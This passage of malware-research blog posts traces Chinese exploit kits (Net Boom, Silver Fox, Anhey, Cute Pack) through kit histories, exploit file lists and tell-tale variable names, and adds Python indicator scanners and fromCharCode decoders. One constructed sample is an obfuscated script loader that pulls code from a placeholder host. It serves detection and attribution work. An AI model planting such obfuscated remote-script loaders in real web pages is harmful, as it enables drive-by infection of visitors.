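        "ANHEINOP", "ANHEYANYWAYALRIGHT", "ANHEYANYWAYOK", "ONLYANHEIWMUP",
        "WOAIANHEYWM",
    },
    "CK Exploit": {
        "CKWM", "CKWMX", "CKCODE", "CK0", "CKWM8",
        "CK.SWF", "CKWM.SWF", "CKWM.JPG", "CK.MID",
    },
}

# Shape patterns for the numbered variants (NB00-NB27, FOX00-FOX27, NB818588)
# and for kit names joined to WM / WANGMA, as described in the post.
KIT_PATTERNS: Dict[str, List[str]] = {
    "Net Boom": [r"^NB\d{2,}$", r"^NB\w*WM\w*$"],
    "Silver Fox": [r"^FOX\d{2}$", r"^(?:SVFOX|YINHU|YHWM)\w*$", r"^SF\w*WM\w*$"],
    "Anhey": [r"^ANHE[IY]\w*$", r"^AH\w*WM\w*$"],
    "CK Exploit": [r"^CK\w*WM\w*$"],
}
_COMPILED = {kit: [re.compile(p) for p in pats] for kit, pats in KIT_PATTERNS.items()}

# Identifiers and file names: a letter followed by letters, digits, "_" or ".".
TOKEN_RE = re.compile(r"[A-Za-z][A-Za-z0-9_.]*")


def extract_tokens(text: str) -> Set[str]:
    """Upper-cased identifier/file-name tokens, with trailing dots stripped."""
    return {t.upper().strip(".") for t in TOKEN_RE.findall(text)}


def scan_tool_marks(text: str) -> Dict[str, List[str]]:
    """Return, per kit, the sorted list of tool marks found in the sample."""
    tokens = extract_tokens(text)
    hits: Dict[str, List[str]] = {}
    for kit in KIT_TOKENS:
        matched = {t for t in tokens if t in KIT_TOKENS[kit]}
        matched |= {t for t in tokens if any(p.match(t) for p in _COMPILED[kit])}
        hits[kit] = sorted(matched)
    return hits


def attribute(text: str, min_hits: int = 2) -> Optional[str]:
    """Name the kit with the most tool marks, or None below the threshold."""
    hits = scan_tool_marks(text)
    kit, matched = max(hits.items(), key=lambda kv: len(kv[1]))
    return kit if len(matched) >= min_hits else None


# Constructed samples in the style of the fragments discussed in the post.
SAMPLE_NETBOOM = """<html><script src="nb.js"></script><script>
var NBMM = "sunshine"; var NBGG = 0; var NB12 = "%u0c0c";
function NBWM() { document.write('<embed src="NBWM.swf">'); }
</script></html>"""
SAMPLE_SILVERFOX = """<script>var SVFOXNET = 1; var YINHUWANGMA = "x"; var FOX05 = "a";</script>"""
SAMPLE_CLEAN = """<script>var counter = 0; function init(){ counter += 1; }</script>"""

if __name__ == "__main__":
    for name, sample in [("netboom", SAMPLE_NETBOOM), ("silverfox", SAMPLE_SILVERFOX), ("clean", SAMPLE_CLEAN)]:
        print(name, "->", attribute(sample), scan_tool_marks(sample))
```

Because the vocabularies are short upper-case strings, the same sets drop straight into a YARA rule or a proxy-log search; the pattern entries are the ones to watch for false positives on unrelated identifiers that happen to start with NB or AH.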

Conclusions

The Net Boom exploit kits are very similar to the earlier Chinese language exploit kits Anhey and Silver Fox. Net Boom products were serviced through the Chinese website 1874.cc in much the same way Silver Fox products were supported by SVFox.net and Anhey products were supported by Cuteqq.cn. The Anhey and Silver Fox kits stopped evolving in late 2010 to early 2011. The Net Boom kits, however, continued to add new exploits through at least late 2011 with the addition of CVE-2011-2140. By tracking network traffic signatures unique to Net Boom, it may be possible to determine whether Net Boom has continued to evolve past 2011.

References

1874.cc June 2011 Screen Shot (http://dawhois.com/site/1874.cc.html)

Korean Security Research Blog (http://kjcc2.tistory.com/1286)

Kahu Security, 22 April 2011, “Flash 0Day Found in Drive By”  (http://www.kahusecurity.com/2011/flash-0day-found-in-drive-by/)

Kahu Security, 12 November 2011, "CVE-2011-2140 Caught in the Wild" (http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/)

Silver Fox Gallery

The Silver Fox Exploit kit is available on several Chinese language hacker sites. The first edition of the kit was released in early to mid-2009 and the last edition appears to have been created in January 2011. The kit was created by the Silver Fox Working Group (银狐工作组) and was originally distributed and serviced via the group's website SVFOX.NET. In addition to the main exploit kit, the Silver Fox group also released several single-exploit kits, also serviced by SVFOX.NET. The main exploit page of the last known Silver Fox Exploit Kit and a screen shot of the last working instance of the SVFOX.NET website are shown below:

svfox2011_c

svfoxGrp

The gallery of Silver Fox releases below shows Version 1.5, Version 1.6, and Version 1.8 of the full kit released in 2009. Version 3.4.1 was produced in April 2010, and Version 4.1.6 was created in January 2011. Four single-exploit kits included builds for claimed 0day exploits for MS09-014, a DirectX-Show vulnerability, a MP3 vulnerability and an IE7 vulnerability.

Version 1.8 introduced tabs for navigating through the application and replaced the Firefox icon in the upper right corner with the Silver Fox icon. This version also listed a second website address, SVFOXWM.51.NET, in addition to SVFOX.NET. Most of the interface was in Chinese, but some parts were in English, suggesting the authors possessed a command of both languages. Version 1.8 included a simple script for obfuscating code using the JavaScript STRING.FROMCHARCODE command or its equivalent in Visual Basic. The kit included instructions and code samples for placing hidden calls to the exploit code into the webpages that potential victims might visit.

Version 3.4.1 listed a second website, SVFOX.COM.CN. Version 3.4.1 featured the same six navigation tabs as Version 1.8, but also included a text box for specifying an address for a web analytics service. The default service providers were 51.Yes and 51.La. The updated interface also offered a package of exploits to be used in conjunction with code that determined key facts about the victim's software configuration and chose the best exploit accordingly. The simple STRING.FROMCHARCODE script in this version included a call to "eatsmart4u.or.kr/admin/comm.js", suggesting that the Silver Fox Working Group may have had a connection to Korea.

In Version 4.1.6, the secondary website listed on the first tab returned to SVFOXWM.51.NET rather than SVFOX.COM.CN.  The package of exploits was updated to include Flash 10 exploit and an IE CSS 0-Day exploit.  The CVE-2010-0806 exploit was now listed as MS10-018 vice IE PEERS.  The obfuscated script reference to “eatsmart4u.or.kr/admin/comm.js” was removed and replaced with a copy of the script itself in decimal ASCII.
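The decimal-ASCII STRING.FROMCHARCODE obfuscation described for Versions 1.8, 3.4.1 and 4.1.6 is easy to undo during triage. The following decoder is an added example written for this post, not code from the Silver Fox kit: it finds every String.fromCharCode(...) call whose arguments are decimal or 0x hexadecimal integers, recovers the text the call builds, recurses into that text for further layers, and lists any URL hosts the decoded layers reference, which is where a remote script reference of the kind noted above would surface. The embedded sample is constructed here, and the host kit-stats.example in it is a placeholder, not an indicator from any real kit.

```python
import json
import re
from typing import List

# One String.fromCharCode(...) call whose arguments are decimal or 0x hex
# integers separated by commas.  Calls with variables or nested expressions
# as arguments are deliberately left alone.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(\s*([0-9a-fA-FxX\s,]+?)\s*\)")

# Hosts in absolute or scheme-relative URLs.  The "//" is required so that
# property accesses such as document.write are not mistaken for host names.
HOST_RE = re.compile(r"(?:https?:)?//([a-z0-9][a-z0-9.-]*\.[a-z]{2,})", re.IGNORECASE)


def _to_int(token: str) -> int:
    token = token.strip().lower()
    return int(token, 16) if token.startswith("0x") else int(token, 10)


def _decode_call(arg_list: str) -> str:
    """Turn the argument list of one call into the string it would build."""
    codes = [_to_int(t) for t in arg_list.split(",") if t.strip()]
    return "".join(chr(c) for c in codes)


def decode_payloads(script: str, max_depth: int = 8) -> List[str]:
    """All strings built by fromCharCode calls, outer layer first, then the
    strings built by calls found inside those strings, and so on."""
    found: List[str] = []
    if max_depth < 0:
        return found
    for match in FROMCHARCODE_RE.finditer(script):
        try:
            text = _decode_call(match.group(1))
        except ValueError:  # bare hex digits without 0x, or a code point out of range
            continue
        found.append(text)
        found.extend(decode_payloads(text, max_depth - 1))
    return found


def unwrap_once(script: str) -> str:
    """Rewrite the script with each decodable call replaced by the equivalent
    JS string literal, for a readable single-layer view."""
    def _sub(match: "re.Match[str]") -> str:
        try:
            return json.dumps(_decode_call(match.group(1)))
        except ValueError:
            return match.group(0)
    return FROMCHARCODE_RE.sub(_sub, script)


def referenced_hosts(script: str) -> List[str]:
    """Sorted, de-duplicated hosts seen in the script or any decoded layer."""
    hosts = set()
    for layer in [script] + decode_payloads(script):
        hosts.update(h.lower() for h in HOST_RE.findall(layer))
    return sorted(hosts)


def _encode(text: str) -> str:
    """Build a decimal argument list; used only to construct the sample below."""
    return ",".join(str(ord(c)) for c in text)


# Constructed two-layer sample: an outer document.write whose decoded text
# itself contains a second fromCharCode layer that loads a remote script.
# kit-stats.example is a placeholder host, not a real indicator.
INNER = ("var s=document.createElement('script');"
         "s.src='http://kit-stats.example/admin/comm.js';"
         "document.body.appendChild(s);")
MIDDLE = "eval(String.fromCharCode(" + _encode(INNER) + "));"
SAMPLE = "document.write(String.fromCharCode(" + _encode(MIDDLE) + "));"

if __name__ == "__main__":
    for depth, layer in enumerate(decode_payloads(SAMPLE), 1):
        print("layer", depth, "->", layer[:60], "...")
    print("hosts:", referenced_hosts(SAMPLE))
    print(unwrap_once("x=String.fromCharCode(72,105);"))
```

The recursion is what makes this useful against Version 4.1.6's change from a remote script reference to an inline decimal copy of the script: the inline copy decodes into JavaScript that may itself carry another encoded layer, and `referenced_hosts` reports any host at whichever depth it appears.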

Silver Fox Version 4.1.6 generated the following exploits and files:

MS OFFICE (CVE-2009-1136): OF.HTM, AC.JPG, BC.JPG, CC.JPG

MS06-004 (CVE-2006-0020): SV14.HTM, 14.JS, 15.JS, 16.JS, 17.JS, 18.JS, 19.JS

MS09-002 (CVE-2009-0075): SV90.HTM, 92.JS, 93.JS

ADOBE PDF:  XP.SWF

MS MPEG-2 (CVE-2008-0015):  SF.HTM, BB.JPG, BB1.JPG, BBBB.JPG, BBBB1.JPG, BBBBB.JPG, LOG.GIF

MS10-02 (CVE-2010-0249): IE.HTM, PARTY.JS, HaspxcSWmblWluWORuCKy.GI

MS10-018 (CVE-2010-0806): X6.HTM, X7.HTM, IFOX.JS, IFOX2.JS, IFOX3.JS, B.JPG, C.JPG, D.JPG

IE CSS 0Day (CVE-2010-3962): IE.HTM, IE.JS

REALPLAYER 11 (CVE-2010-3747): SVR11.HTM, R2.CSS, R.CSS

THUNDER 5 (XUNLEI) (CVE-2007-6144): SVXL.HTM, XL.JS, XLS.JS

FIREFOX 3.X (CVE-2009-2478): SVFFOX.HTM, SVFOX.HTM, ECFOX.JS, ECFOXX.JS

IE7 0DAY (CVE-2009-3672): I7.HTM, I8.JS, UBS.JS

FLASH 9 (CVE-2007-0071): F16.SWF, F28.SWF, F45.SWF, F47.SWF, F64.SWF, F115.SWF, I16.SWF, I28.SWF, I45.SWF, I47.SWF, I64.SWF, OR I115.SWF

FLASH 10 (CVE-2009-1862): IE.HTM, SVF10.HTM, FF.HTML, IE.JS, IF.JS, FF.JS, XP.SWF

The Silver Fox decision making code to match the victim’s system configuration with the best exploit was contained in the following files:

Exploit Package Files: SILVER.HTM, FOX.HTM, SVF.HTM, SVX.HTM, UBB.JS

Like the Anhey Kit, the authors of the Silver Fox kit were not shy about using explicit references to their product in the file and variable names generated by their software.  This approach can clearly be seen in the file names listed above to include SILVER.HTM, FOX.HTM, SVF.HTM, SVX.HTM, SVF10.HTM, SVFFOX.HTM, SVFOX.HTM, ECFOX.JS, ECFOXX.JS, SVR11.HTM, IFOX.JS, IFOX2.JS, IFOX3.JS, SF.HTM, SV90.HTM and SV14.HTM.

Several more references to the product's name can be found inside the files. Names such as SILVERFOX, SVFOX, SVF, SV and SVFOXNET require no explanation. Other names represent Chinese characters transcribed into Chinese Pinyin. The Chinese characters for Silver Fox are "银狐" and the Pinyin for Silver Fox is Yín hú or YINHU. The Pinyin for the characters 网马 is Wǎng mǎ or WANGMA, which translates to Network Horse, or Network Trojan. WANGMA is a common term used on Chinese language hacker sites to describe browser-based exploits that originate from legitimate websites infected by SQL injection or ARP cache poisoning. The characters 银狐网马, or Pinyin Yín hú Wǎng mǎ, translate to Silver Fox Network Trojan. In Silver Fox Exploit Kit code, the Pinyin "Yín hú Wǎng mǎ" is frequently written as YINHUWANGMA or abbreviated to YHWM. The terms WANGMA or WM are sometimes preceded by English rather than Chinese spellings of the kit name, as in SVFOXWM or SFWM. The list below includes some of the more unique variable names organized by exploit:

MS OFFICE (CVE-2009-1136): SILVERFOX, SVFOXNET, YINHU, YINHUKING, YHWM, YHWMWHYM, YINHUMM, YNHUGG, YINHUU, YINHU00, YINHO01, YINHO02, YINHU03, IFOXNET, IFOX, KO, CCKL

MS06-004 (CVE-2006-0020): SILVERFOXCODE, SVFOXWM, SFWM, SVFOXNAME, LOVESVFOXXX, WWWSVFOXNET, WWWSVFOXCN, SVFOXZF, SVFOXZFS, SVFOXZFX, SVFOXADO, WOWFOX, IFOXFOXWM, SVFOXXML, CHILAM

MS09-002 (CVE-2009-0075): SVSVSV, FANGP, CAONIMA, LASHI, LANIO

ADOBE PDF:

MS MPEG-2 (CVE-2008-0015):  SILVERFOXWM, SFWMSFWMSFWM, SILVERCOLOR, SILVERCOLORFOX, SFQQQ, FOXMM, FOXGG, FOXBB, FOXYY, FANGPIJIUCHOU, SUNSHINE, MONEY

MS10-02 (CVE-2010-0249): SSS, CC, WMAHWM, OAH, OAHO, LHAH, HHAH, SSAH, SHIT, HUA, HUA1, HUA2, HUA3, HUA4

MS10-018 (CVE-2010-0806): SVFOXNET, YINHUWAGMA, ANHEIWAGMA, AHWMNIUX, ANHEYSIZE, AHEYOK, ANHEINOP, ANHEYANYWAYALRIGHT, ANHEYANYWAYOK, ONLYANHEIWMUP, WOAIANHEYWM, SUN

IE CSS 0Day (CVE-2010-3962): SVFOXWMA, SVNOP, SF

REALPLAYER 11 (CVE-2010-3747): SVKILL, BBQ

THUNDER 5 (XUNLEI) (CVE-2007-6144): SFCODE, SFXCODE, HELLOWORLD2ADDRESS, HBSHELLOWORLD, ECQQUNE, ECQQXUS, XFY

FIREFOX 3.X (CVE-2009-2478): QZONE_EXE, ANTI_EXE, KAPERSKY_EXE, ANTI_EXE, KABA, LOREMIPSUMDOLOREGKUW, LOREMIPSUMDOLOREGKUWIERT, LOREMIKDKW

IE7 0DAY (CVE-2009-3672): FOXYY, FOX00-FOX27

FLASH 9 (CVE-2007-0071):

FLASH 10 (CVE-2009-1862): ARR, SSS, NOP, QVISI, DD, ‘PARAM NAME=”MOVIE” VALUE=”DONE.SWF”’, ‘EMBED SRC=”XP.SWF’

This unabashed use of the product name and company websites in the file and variable names is very similar to the technique used by the Anhey (Diablo) Working Group associated with the Cuteqq.cn website. These similarities in coding techniques, identical or very similar exploit code, identical application code, and some curious unique references to Anhey in the Silver Fox code reveal a strong relationship between the two kits. Could the Anhey Exploit Kit and the Silver Fox Exploit Kit have been written by the same people? Could the Silver Fox Exploit Kit and the SVFOX.COM website be the successors of the Anhey Exploit Kit and the CUTEQQ.CN website? The answers are hard to determine with certainty, but there is definitely a lot of evidence to support these possibilities.

A lot of detail about the Anhey Working Group and the Anhey Exploit kit is available in my 02 February 2012 post "Anhey Menagerie". Some of the code generated by the Silver Fox Exploit Kit is almost identical to that of the last Anhey Exploit Kits released in late 2009 through early 2010. The name ANHEY comes from an alternate spelling of the Pinyin ANHEI (Ànhēi) for the Chinese characters "暗黑". In English, the word translates to darkness or Diablo. The Anhey exploit code includes numerous references to ANHEY, ANHEI and AH.

The Silver Fox exploit code for MS10-018 (CVE-2010-0806) makes several very clear references to both the Silver Fox Exploit Kit (YINHUWAGMA, SVFOXNET) and the Anhey Exploit Kit (ANHEIWAGMA, AHWMNIUX, ANHEYSIZE, AHEYOK, ANHEINOP, ANHEYANYWAYALRIGHT, ANHEYANYWAYOK, ONLYANHEIWMUP, WOAIANHEYWM). Some of these names were not previously seen in the code generated by the Anhey kits. So, it appears that the authors of the Silver Fox Kit intentionally included these unique references to the Anhey Exploit Kit.

In addition to these references, significant similarities can be seen in the MS OFFICE (CVE-2009-1136) exploit, the MS10-02 (CVE-2010-0249) exploit and the FIREFOX 3.X (CVE-2009-2478) exploit.  The Flash 9 and Flash 10 exploit files generated by the two kits are identical. The instructions generated by the kits for deploying the exploits were almost identical.  The only difference was the addition of the Silver Fox name to the first line of the text.  Likewise, the function for obfuscating code using STRING.FROMCHARCODE from Silver Fox and Anhey Version 2.4.1 were identical.  Finally, the two programs use the same third party Skin++ library (SkinPPWTL.dll) for creating the user interface as shown below.  The first screen shot is from the last Silver Fox 2011 Exploit Kit and the second screen shot is from the last Anhey 2010 Exploit Kit.

anhey_SVFox_skin

Similar relationships exist between the Silver Fox Exploit kit, the God Axe Exploit kit and the Net Boom Exploit Kit.

All of the screen shots used in this post are available here.

Anhey Menagerie

The Anhey/Cuteqq Exploit Kit began in 2007 and became popular in China in 2008.  In 2010, the kit was associated with the DNF666 mass SQL injections.  No new releases have been identified since mid-2010, and the Cuteqq.cn and Anhey.com websites associated with the kit are no longer active.

Val Smith, Anthony Lai and Colin Ames’ white paper “Balancing the Pwn Trade Deficit”, and Armorize Technologies’ blog post “Solving the puzzle: mass SQL injection+0day flash drive-by download attacks robint.us and 2677.in”, provide thorough descriptions of the Anhey/Cuteqq Exploit Kit.  The two sources use the following screen captures of the Anhey Exploit Kit and the Cuteqq.cn web site in their reports:

anhey2010Pro5cuteqqcn

There are a handful of Anhey kits, however, that were not covered by the reports or listed on the Cuteqq.cn screen capture shown above.  Since I have collected a small menagerie of these kits, I thought I would share it here in the hope that others might find it interesting or useful.  This is not an exhaustive collection of Anhey Exploit Kits; it is only what I could cobble together by scratching and pecking at hacker sites.  Please forgive the obvious omissions in my descriptions of the screen captures.  I do not know Chinese.

My collection begins in 2007 with Cuteqq.cn products released before the Anhey Exploit Kit was established.  One image references Cuteqq.cn and features the name “Game Idea” over an Xbox game controller with a superimposed image of a spider.  The name of the application, however, was “终极网马生成器6 Beta 1”, or “Ultimate Network Trojan Code Generator 6 Beta 1”.  The original image file included the date string 20070624.  The second image shows the Ultimate Network Trojan Code Generator 6 Beta 3.  This image had a file date of 20070703.  Searches for 终极网马生成器6 indicate that a Beta 4 version exists as well.

20070624121030544 20070703113924310

A download of the Ultimate Network Trojan Code Generator 6 Beta 6 SP 2 had a modification date of 20070731 and included references to the Cuteqq.cn site.  The properties of the executable listed the Foreign Land Team (FLT) as the company producing the software.  Some of the variable and function names in the code generated by this kit include CUTEQQ, CUTEQQCN, CUTEQQVIP, WWWCUTEQQCN and QQ784378237, all hallmarks of Anhey-generated code.  A person using the name Chilam may have been one of the contributors to the code.

cuteqq-Ult6bSp2 cuteqq-Ult6bSp2Properties

The next Cuteqq.cn kit I encountered had a date string of 20070913 in the file name.  The faint watermarks behind the graphically displayed product name look similar to the watermarks in the 20070731 Ultimate Network Trojan kit.  The name, however, changed to “暗黑網馬”, which translates to “Diablo Network Trojan”.  The characters are pronounced “Ànhēi wǎng mǎ”.  The authors of the code frequently write the name as ANHEY WANGMA, ANHEY or AH.

The Anhey name changed again in a kit released in January 2008.  The graphic display featured a caricature of the Devil to the left of the new names “暗黑工作組” and “黑客X档案”.  The first name translates to “Diablo Working Group” and the second to “Hacker X Files”.  A 20080116 Chinese-language post by a blogger named LZHacker explains that the new exploit kit was the result of a collaboration between the Hacker X Files Group at bbs.hackerxfiles.net and the Diablo Working Group at www.cuteqq.cn.  The machine translation and original text of the post are available here.

20070913150758242 20086271011392529

Another noteworthy feature of the January 2008 Anhey Exploit Kit is the English text “The more you learn, the more you know, The more you know, the more you forget The more you forget, the less you know. So why bother to learn.”  The authors appear to have a good command of English in addition to Chinese.

By 20080601, Version 2 of the Anhey Exploit Kit was available.  This version retained the overall appearance of the 20080101 kit, except that the references to the Hacker X-Files Group were removed and the graphics were displayed against a more textured orange background.  The textured background can probably be attributed to the use of the Skin++ graphics library (SkinPPWTL.dll) included with all of the recent editions of the Anhey Exploit Kit.  In addition to the Version 2 release, the group released a Version 2.74 and a Version 2.76, most likely between June and October of 2008.

anhey_2 anhey2_74 anhey2_76

The XiaoLin Security Team described the Diablo (Anhey) Network Trojan VIP 2008 Standard Version 3.0 in an article dated 20080430.  The article read like a product brochure: it included a pricing schedule and explained the benefits of a premium subscription.  At the time, the official version of the kit was the 2008 VIP 2.0.  The VIP 2008 Version 3 was released as an R&D beta.  The R&D release included exploits that were not included in previous or later editions of the kit.  Taken together, the exploits offered in this special release seem to match the exploits used in the 2008 SQL injection attacks that resulted in the United Nations site serving malware.  The style of the user interface in the R&D release shown below would not become the product’s standard interface until late 2009.

042901

The appearance of the kits changed again with the new Anhey/Cuteqq Diablo Exploit Kit Version 1.0.  The caricature of the Devil was replaced with a blue and silver globe, and the fiery orange background was replaced by blue and pink pastels.  The name Diablo Working Group, however, remained unchanged.  The name of the executable file was EvilCute.exe.  The string EVILCUTE is also frequently found in the code generated by Anhey kits.  A 2009 version 1.1 was created on 20090410 and a 2009 version 2.4 was created on 20090926.  Finally, a 2009 version 4.0 was created on 20091030.  The executable file for the version 4 kit was named AH2009.exe.  Visually, this version had more in common with the 2008 R&D Beta than with the previous three 2009 kits.

Anhey2008v1 Anhey2009v1_1

anhey2009v2_4 anhey2009v4

The final Anhey kits were released sometime in mid-2010 and were described in detail in Val Smith’s white paper.  The appearance of the kit changed once again but was still enabled by Skin++.  Interestingly, the references to Cuteqq.cn were changed to Anhey.com.  The IP address and domain registration information for Anhey.com were the same as those for Cuteqq.cn.  Neither domain is active any longer.

anhey2010ProE5

In conclusion, the Anhey or Diablo Network Trojan Exploit Kit appears to have evolved from the Cuteqq.cn Ultimate Network Trojan Code Generator 6 during the second half of 2007.  One of the original contributors may have used the name CHILAM.  One of these early kits referenced a company called the Foreign Land Team (F.L.T.).  The first actual Anhey kit was released in January of 2008.  It was created and promoted as a joint effort between the Anhey Working Group and the well-known Hacker X-Files Group, as described by an individual called LZHacker.  By mid-2008, the appearance of the product user interface was enhanced through the use of a third-party library called Skin++.  All subsequent releases included Skin++ (SkinPPWTL.dll).  In 2010, the domain name Cuteqq.cn was swapped for Anhey.com.  The last known release of an Anhey Exploit Kit was in June of 2010.  The kits are still available for download on Chinese-language hacker sites and are often offered in conjunction with tutorials and training courses.

My collection of Anhey Exploit Kit screen captures is available here for download.

References:

Balancing the Pwn Trade Deficit

Solving the puzzle: mass SQL injection+0day flash drive-by download attacks robint.us and 2677.in

XiaoLin Security Team 2008-4-30

The United Nations Serving Malware


A Second Look at Cute Pack


In February 2012, the Kahu Security Blog described three new Chinese exploit packs: Cute Pack, Yang Pack and Zhi Zhu Pack.  Interest in the Yang Pack and Zhi Zhu Pack continued throughout 2012.  By the end of 2012, Yang and Zhi Zhu had earned a position on Contagio’s Exploit Pack Table.  Cute Pack, however, seems to have been forgotten by all but the most obscure bloggers.

The actual name of the kit that generated the Cute Pack first stage exploit is included as a variable name in the CUTE-IE.HTML file.  The name ANHEYWANGMA is a phonetic representation of the Chinese characters “暗黑网马”.   The characters 暗黑 (Ànhēi or Anhey) translate to “Diablo” or “Darkness”.  The characters 网马 (Wǎng mǎ) translate to “Network Horse” or “Network Trojan”.  Wang Ma is a commonly used term found in Chinese language hacker sites to describe browser-based exploits that originate from legitimate websites infected by SQL injection or ARP cache poisoning.

Val Smith, Anthony Lai and Colin Ames provided a detailed description of the Anhey Exploit Kit during the DEFCON 2010 conference and in their July 2010 paper entitled “Balancing the Pwn Trade Deficit”.  The paper includes a description of the CVE-2010-0806 exploit files CUTE-IE.HTML, PACK.JS and PACK.CSS.  The files were generated from an Anhey Exploit Kit (ah_IE_0day.exe) shown below.  The application name displayed at the top of the window translates to “Diablo (Anhey) IE 0DAY Network Trojan Code Generator”.  The characters in the graphic display translate to “Diablo (Anhey) Working Group”.  The properties for the executable include a reference to the “Cuteqq Software Team” and a modification date of 12 January 2010 – just three days after the CVE-2010-0806 was disclosed by Microsoft.

ah_ie-0day

The content of the Anhey-generated version of CUTE-IE.HTML is almost identical to the CUTE-IE.HTML code fragment provided by Kahu.  The only visible difference between the two files, other than whitespace and line breaks, is in the variable SSS.  The Anhey-generated value of the variable SSS includes a JS pop-up box advertising the Anhey Exploit Kit after the exploit is triggered.  Translated, the pop-up reads “Anhey Network Trojan QQ: 443 816 808 determined run overflow!”.  The decoded version of the decimal ASCII values found in variable SSS and the corresponding code fragments are shown below.

exploitcode1

KAHU_DEFCON10

The Anhey Exploit Kit referenced above was designed specifically for the CVE-2010-0806 exploit.  Other versions of the Anhey kits include several other exploits.  Screen shots of the full Anhey “VIP 2010 Professional Edition Five” kit and corresponding Cuteqq.cn web site are reproduced from Val Smith’s paper and shown below.

anhey2010ProE5

cuteqqcn

The authors of this kit do not seem to pass up any opportunity to let their name be known.  In addition to the explicit use of the exploit kit name, ANHEYWANGMA, as a variable name, the authors have left several other calling cards in their code.  The exploit code generated by these kits employs several recognizable signatures.  A few of these signatures are listed below.

ANHEYWM: shortened version of ANHEYWANGMA
AHWM: shortened version of ANHEYWM or ANHEYWANGMA
ANHIE: alternate spelling of ANHEY
CUTEQQ: the original Anhey (Diablo) website, CUTEQQ.CN
EVILCUTE: possibly a combination of the words “Anhey” (Diablo) and “Cute”
CUTEPOWER: Power
CUTEMONEY: Wealth
CUTESHINE: Knowledge
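Two things in this post lend themselves to a small analysis script: the decimal ASCII values that the SSS variable and the kit’s STRING.FROMCHARCODE obfuscator hide text behind, and the calling-card names listed above. The following Python is an added example, not code from the post or from any exploit kit: it decodes fromCharCode argument lists and quoted decimal lists back to text, then scans both the raw page source and the decoded strings for the Anhey indicator names. The sample HTML it runs over is constructed for the example and is not the real CUTE-IE.HTML.

```python
import re
from typing import Dict, List

# Indicator names the post lists as Anhey "calling cards" (variable and
# function names seen in kit-generated code).
ANHEY_INDICATORS = (
    "ANHEYWANGMA", "ANHEYWM", "AHWM", "ANHIE", "ANHEI", "ANHEY",
    "CUTEQQ", "CUTEQQCN", "CUTEQQVIP", "WWWCUTEQQCN",
    "EVILCUTE", "CUTEPOWER", "CUTEMONEY", "CUTESHINE",
)

# String.fromCharCode(65, 72, ...) calls; the argument list is captured.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(\s*([0-9\s,]+)\)", re.IGNORECASE)
# A quoted, comma-separated list of decimal codes, the form the post
# describes for the SSS variable.
DECIMAL_LIST_RE = re.compile(r'"((?:\d{1,3}\s*,\s*)+\d{1,3})"')
# JavaScript-style identifiers, used to pull candidate names out of text.
IDENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")

# Constructed sample page (assumption: not the real CUTE-IE.HTML).
SAMPLE_HTML = """<html><script>
/* constructed sample, not the real CUTE-IE.HTML */
var ANHEYWANGMA = "wang ma";
var AHWMNIUX = 0;
var SSS = "65,110,104,101,121,32,111,107";
var msg = String.fromCharCode(69,86,73,76,67,85,84,69);
</script></html>"""


def decode_decimal_codes(codes: str) -> str:
    """Turn '65, 72, 87' into 'AHW'; non-printable codes become '?'."""
    out = []
    for tok in codes.split(","):
        tok = tok.strip()
        if not tok:
            continue
        n = int(tok)
        out.append(chr(n) if 32 <= n < 127 else "?")
    return "".join(out)


def decode_obfuscated_strings(source: str) -> List[str]:
    """Return every string recovered from fromCharCode calls (first) and
    quoted decimal lists (second) in the page source."""
    found = [decode_decimal_codes(m.group(1)) for m in FROMCHARCODE_RE.finditer(source)]
    found += [decode_decimal_codes(m.group(1)) for m in DECIMAL_LIST_RE.finditer(source)]
    return found


def find_anhey_indicators(source: str) -> Dict[str, List[str]]:
    """Scan raw source plus decoded strings for identifiers that contain
    an indicator name. Substring matching is deliberate: the post shows
    names such as AHWMNIUX and WOAIANHEYWM that embed the short forms.
    Returns {indicator: sorted list of matching identifiers}."""
    hits: Dict[str, set] = {}
    for text in [source] + decode_obfuscated_strings(source):
        for ident in IDENT_RE.findall(text):
            upper = ident.upper()
            for name in ANHEY_INDICATORS:
                if name in upper:
                    hits.setdefault(name, set()).add(ident)
    return {name: sorted(idents) for name, idents in hits.items()}


if __name__ == "__main__":
    for s in decode_obfuscated_strings(SAMPLE_HTML):
        print("decoded:", s)
    for name, idents in sorted(find_anhey_indicators(SAMPLE_HTML).items()):
        print(f"{name}: {', '.join(idents)}")
```

Decoding before scanning matters because the kit’s pop-up text and some names live only inside the decimal arrays; a scan of the raw source alone would miss EVILCUTE in the sample, which only appears after String.fromCharCode is decoded.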

I have not seen any new editions of the Anhey kit since May 2010.  So, why did I bother investigating a dead exploit kit?  It is possible that the Anhey Exploit Kit has evolved into newer kits that continue to incorporate more recent exploits.  Possible successors to the Anhey kit include the Yang, Zhi Zhu, Kaixin and Dadong Exploit Kits.  It will be interesting to see whether any of the peculiarities of the Anhey kit appear in the more recent Chinese exploit kits as well.

References:

Balancing the Pwn Trade Deficit

Chinese Exploit Packs

Another Chinese Pack

Common Exploit Kits 2012 Poster